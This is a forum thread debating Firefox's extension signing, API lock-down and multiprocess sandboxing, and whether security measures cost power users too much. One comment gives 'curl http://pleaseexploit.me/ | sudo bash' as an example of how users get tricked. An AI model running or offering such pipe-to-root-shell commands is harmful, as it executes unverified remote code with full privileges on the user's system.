You can still tinker when building firefox from source.
I agree it's not as convenient as the default builds being open to such modding, but that's the point - the default builds should be safer because 99% of users don't tinker.
Well, fixing security bugs obviously is necessary. But that doesn't mean that features should be thrown out of the window in the name of security.
And I was mostly referring to mozilla's tendency to nanny its users.
For example the argument for extension signing is that users can't decide for themselves what to install. And that even side-loading from the operating system would be too dangerous because some users could get tricked (in my book that's a people problem, not a software problem).
And again, the argument for whitelisted, locked-down APIs for extensions is security, that giving extensions the same powers as native applications (which don't have to be signed) is unacceptable. Again, reducing features in the name of security.
Fixing privilege escalation attacks and nannying users so they don't apply foot-guns are two quite separate approaches to security in my opinion. Especially since the latter is onerous on powerusers while the former is not.
The restrictions weren't necessary in the past, the situation was clearly good enough for millions to start using browsers. Why is it necessary now?
> The restrictions weren't necessary in the past, the situation was clearly good enough for millions to start using browsers. Why is it necessary now?
Much of the impetus for this change is to make sandboxing possible. You need to be a multiprocess browser to be a sandboxed browser. Multiprocess Firefox is incompatible with many of the things that addons are doing right now. So, this statement is equivalent to "we didn't need sandboxing before; why do we need it now?" Is that what you're arguing?
> Much of the impetus for this change is to make sandboxing possible.
The whole parade of extension signing, deprecating XUL, privileged extensions and XPCOM are all necessary to make sandboxed e10s processes work? I thought the child processes already are somewhat sandboxed right now.
> Multiprocess Firefox is incompatible with many of the things that addons are doing right now.
And yet a transition seems to be possible without telling developers "you will never ever be allowed to access internals again". It's more of an outreach thing "headsup, you should fix your addon".
And really, isn't that new deprecation and eventual no-AMO-approval policy equivalent to breaking them anyway? So why not just go ahead and break them and let those people tinker who don't mind occasional breakage.
> So, this statement is equivalent to "we didn't need sandboxing before; why do we need it now?" Is that what you're arguing?
To some extent, yes, but not quite. I'm asking why it is suddenly necessary to increase security at the expense of features.
But I'll follow that train of thought anyway: Is it necessary? Wouldn't it be sufficient to write safer, less exploitable software? Isn't that part of the goal of Rust for example?
Just because we existed without them before doesn't mean the restrictions weren't needed.
We always needed Sandboxing and multi-process Firefox, even though we were able to get by without it for years. Likewise, side-loaded add-ons that can steal your information are a legit security threat, even if you think you're such a smart user that you could somehow avoid ever being burned by it.
> side-loaded add-ons that can steal your information are a legit security threat
How so? Sideloading means OS-level access. OS-level access means your whole user account is already compromised if it was malicious software.
There is no additional security gained by preventing side-loading after malicious software already got into your system.
If someone social-engineers you into "install this .xpi" they might as well manage to trick you into "run this .jar" or "run this .exe" or please "curl http://pleaseexploit.me/ | sudo bash" to check out our newest software!
> So it's ok to make life harder for 1% so the 99% have it easier?
Generally speaking - yes.
Making a browser safer for 99% of people might be worth making the experience of 1% a little less flexible.
Unless you can find a solution that makes 100% of people happy, we will always have such tradeoffs. And so far, no browser has found such a solution for addons.
I agree it's not as convenient as the default builds being open to such modding, but that's the point - the default builds should be safer because 99% of users don't tinker.